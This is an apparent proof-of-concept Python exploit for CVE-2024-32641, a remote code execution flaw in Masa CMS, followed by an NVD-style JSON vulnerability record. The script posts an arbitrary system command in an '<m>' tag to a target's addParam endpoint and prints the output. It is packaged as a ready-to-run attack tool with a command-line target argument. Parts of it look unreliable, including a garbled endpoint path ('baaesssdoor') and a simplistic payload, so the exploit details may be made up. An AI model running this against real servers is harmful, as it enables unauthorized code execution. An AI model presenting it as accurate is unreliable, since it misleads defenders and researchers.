CVE-2024-32641

import requests import sys # CVE-2024-32641 PoC - Masa CMS Remote Code Execution # Target: Masa CMS < 7.2.8, 7.3.13, 7.4.6 def exploit_cve_2024_32641(target_url, command="whoami"): """ Exploit for CVE-2024-32641: Masa CMS addParam RCE via m tag Args: target_url: Base URL of the vulnerable Masa CMS instance command: System command to execute on the target server Returns: Response content containing command execution result """ # Construct the vulnerable endpoint endpoint = f"{target_url}/index.cfm/baaesssdoor/addParam" # Payload using m tag for command execution # The addParam function accepts criteria parameter which is evaluated by setDynamicContent payload = f"<m>{command}</m>" # Prepare the POST request data = { "criteria": payload } try: # Send the exploit request response = requests.post(endpoint, data=data, timeout=30, verify=False) print(f"[*] Target: {target_url}") print(f"[*] Command: {command}") print(f"[*] Status Code: {response.status_code}") print(f"[*] Response:\n{response.text}") return response.text except requests.exceptions.RequestException as e: print(f"[!] Error: {e}") return None if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url> [command]") print(f"Example: python {sys.argv[0]} http://vulnerable-site.com whoami") sys.exit(1) target = sys.argv[1] cmd = sys.argv[2] if len(sys.argv) > 2 else "whoami" exploit_cve_2024_32641(target, cmd)

{"cve": {"id": "CVE-2024-32641", "sourceIdentifier": "[email protected]", "published": "2025-12-03T17:15:48.220", "lastModified": "2025-12-05T14:47:50.093", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Masa CMS is an open source Enterprise Content Management platform. Masa CMS versions prior to 7.2.8, 7.3.13, and 7.4.6 are vulnerable to remote code execution. The vulnerability exists in the addParam function, which accepts user input via the criteria parameter. This input is subsequently evaluated by setDynamicContent, allowing an unauthenticated attacker to execute arbitrary code via the m tag. The vulnerability is patched in versions 7.2.8, 7.3.13, and 7.4.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:masacms:masacms:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.2.8", "matchCriteriaId": "82A74C33-3407-498A-9444-4A451E5968FE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:masacms:masacms:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.3", "versionEndExcluding": "7.3.13", "matchCriteriaId": "45C4FA2D-DCEF-4991-B21D-C2BAC3A9DF5C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:masacms:masacms:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.4.0", "versionEndExcluding": "7.4.6", "matchCriteriaId": "ED61DA62-94D4-4081-923F-2674CFC7945A"}]}]}], "references": [{"url": "https://github.com/MasaCMS/MasaCMS/commit/fb27f822fe426496af71205fa35208e58823fcf6", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/MasaCMS/MasaCMS/security/advisories/GHSA-cj9g-v5mq-qrjm", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}